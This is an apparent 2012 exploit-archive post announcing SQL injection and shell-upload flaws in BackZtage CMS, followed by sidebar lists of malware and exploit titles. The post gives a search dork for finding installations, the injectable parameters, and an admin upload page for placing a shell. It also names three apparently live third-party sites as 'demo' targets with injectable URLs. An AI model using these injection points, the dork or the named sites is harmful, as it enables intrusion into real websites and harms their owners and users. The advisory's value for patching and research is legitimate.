BackZtage CMS Shell Upload / SQL Injection

Posted on 11 February 2012

BackZtage CMS ( SQLi/ File Upload ) Vulnerabilities Software : BackZtage Date : 2/9/2012 Vendor : http://www.backztagemedia.com Software : http://www.backztagemedia.com/services.php Dork : "Powered by BackZtage" Author : ITTIHACK Home : http://ittihack.com SQL Injection: Exploit : http://target//search.php?id=[SQLi] http://target//product.php?id=[SQLi] http://target//photo.php?id=[SQLi] File Upload: Exploit : http://target/admin/uploadlogin.php Demo Sites: http://www.dpproductions.sg/photo.php?id=3 http://www.ajmason.com/project-gallery.php?id=25 http://backztage.com.hk/subcategory.php?cid=93 May allah have mercy on the martyrs of Syria

TOP

Malware :

RATDispenser
whispergate
Borat RAT
Trojanized X_Trader
BlackLotus

Last 20

Exploits :

User Registration And Management System 3.2 SQL Injection
Bagisto 2.1.2 Client-Side Template Injection
Backdoor.Win32.Plugx MVID-2024-0686 Insecure Permissions
Microweber 2.0.15 Cross Site Scripting
Apache OFBiz Forgot Password Directory Traversal

Last 20